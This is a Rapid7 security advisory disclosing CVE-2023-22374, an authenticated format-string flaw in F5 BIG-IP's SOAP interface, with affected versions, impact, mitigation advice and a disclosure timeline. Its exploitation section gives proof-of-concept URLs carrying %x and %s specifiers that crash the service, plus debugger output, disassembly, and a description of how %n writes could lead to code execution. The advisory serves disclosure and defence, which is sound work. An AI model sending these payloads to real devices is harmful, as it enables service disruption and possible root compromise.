Last updated at Wed, 01 Feb 2023 15:57:57 GMT
While following up our previous work on F5's BIG-IP devices, Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. We reported it to F5 on December 6, 2022, and are now disclosing it in accordance with our vulnerability disclosure policy.
The specific issue we found is an authenticated format string vulnerability (CWE-134) in the SOAP interface (iControlPortal.cgi), which runs as root and requires an administrator login to access. By inserting format string specifiers (such as %s or %n) into certain GET parameters, an attacker can cause the service to read from and write to memory addresses referenced from the stack. In addition to being an authenticated administrative endpoint, the disclosed memory is written to a log (making this a blind attack). It is difficult to influence the specific addresses that are read and written, which makes this vulnerability hard to exploit in practice (beyond crashing the service). This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.
Products
This issue only affects BIG-IP (not BIG-IQ), and at the time of writing no fix is available. The currently supported versions known to be vulnerable are:
- F5 BIG-IP 17.0.0
- F5 BIG-IP 16.1.2.2 - 16.1.3
- F5 BIG-IP 15.1.5.1 - 15.1.8
- F5 BIG-IP 14.1.4.6 - 14.1.5
- F5 BIG-IP 13.1.5
Discoverer
This issue was discovered by Ron Bowes of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.
Exploitation
The issue we are disclosing is a blind format string vulnerability, in which an authenticated attacker can insert arbitrary format string specifiers (such as %d, %x, %s, and %n) into a query parameter; the parameter is passed into the function syslog(), which processes format-string specifiers. This does not require the attacker to actually read the syslog entries; the act of parsing the format string is the problem. That also means that the attacker can't read memory unless they have an additional way to read the syslog. By using the %s specifier, the service can be made to crash with a segmentation fault (because it tries to dereference a pointer on the stack as a string). Using %n, arbitrary data can be written to any pointer found on the stack; depending on what is present on the stack, this may be exploitable for remote code execution.
The issue occurs in the WSDL= parameter in the following authenticated administrative URL:
The value of the WSDL= parameter is written to the syslog:
Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile
If an attacker adds format-string characters to that argument, they will be processed, and values from the stack can be written to the syslog (which the attacker cannot see, so it's actually a blind format-string vulnerability). For example, this URL:
http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x
Might write the following, after expanding the %08x format specifiers to values from the stack (the colons are just for readability):
Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile:0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000
Once again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a %s format specifier, which tells the service to attempt to render a string from the stack. If the value on the stack is not a valid memory address (for example, the first value, which is 0x0000004c), the process will crash with a segmentation fault. We can also use the %n format specifier to write a (mostly) arbitrary value to a memory address found on the stack.
Here is an example of using the %s specifier in a request:
http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s
If we send that to the server (as an authenticated request), the service will crash. We can attach a debugger to the server process to validate:
[root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335
[...]
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xf55e3085 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0xf55e3085 in vfprintf () from /lib/libc.so.6
#1 0xf568f21f in __vsyslog_chk () from /lib/libc.so.6
#2 0xf568f317 in syslog () from /lib/libc.so.6
#3 0x0810cc1f in PortalDispatch::HandleWSDLRequest(char*) ()
#4 0x08109f08 in iControlPortal::run(int) ()
#5 0x0810947f in main ()
The actual vulnerable code in PortalDispatch::HandleWSDLRequest in iControlPortal.cgi is (in a disassembler):
.text:0810CBF2 loc_810CBF2: ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD↑j
.text:0810CBF2 pop ecx
.text:0810CBF3 pop edi
.text:0810CBF4 push esi ; Query string
.text:0810CBF5 push eax
.text:0810CBF6 call __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<>(std::basic_ostream> &,char const*)
.text:0810CBFB pop eax
.text:0810CBFC pop edx
.text:0810CBFD lea eax, [ebp+var_8C8]
.text:0810CC03 lea edi, [ebp+format]
.text:0810CC09 push eax
.text:0810CC0A push edi
.text:0810CC0B call __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf,std::allocator>::str(void)
.text:0810CC0B ; } // starts at 810CBE6
.text:0810CC10 pop eax
.text:0810CC11 push dword ptr [ebp+format]
.text:0810CC17 push 6
.text:0810CC19 ; try {
.text:0810CC19 call _syslog ; <--- Vulnerable call to syslog()
.text:0810CC19 ; } // starts at 810CC19
A String object (that contains query:) has the query string appended to it, and the result is then passed directly to _syslog() as the format argument, which processes format string characters.
Impact
The most likely impact of a successful attack is crashing the server process. A skilled attacker could potentially develop a remote code execution exploit, which would run code on the F5 BIG-IP device as the root user.
Remediation
There is currently no fix for this issue in released BIG-IP software versions. F5 has indicated that an engineering hotfix will be made available. It should be emphasized that this issue can only be exploited as an authenticated user of the vulnerable device. Therefore, end users should restrict access to the management port to trusted individuals only (the linked KB provides a procedure for binding webd to localhost), which is usually good advice anyway.
Rapid7 customers
An authenticated vulnerability check for CVE-2023-22374 will be released in today's (February 1) content-only release. Because F5's hotfix policy is that these hotfixes are "not guaranteed to be available," please note that the vulnerability check in InsightVM will not take hotfixes into account.
Timeline
- December, 2022 - Discovered the vulnerability
- Tue, Dec 6, 2022 - Reported to F5 SIRT
- Wed, Dec 7, 2022 - F5 forwarded the report to the F5 product engineering team for analysis
- Thu, Dec 22, 2022 - F5 confirmed the issue and began working on a fix
- Wed, Jan 4, 2023 - Reported the issue to CERT/CC (vrf# 23-01-TVJZN)
- Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation
- Wed, Feb 1, 2023 - This public disclosure and F5's advisory published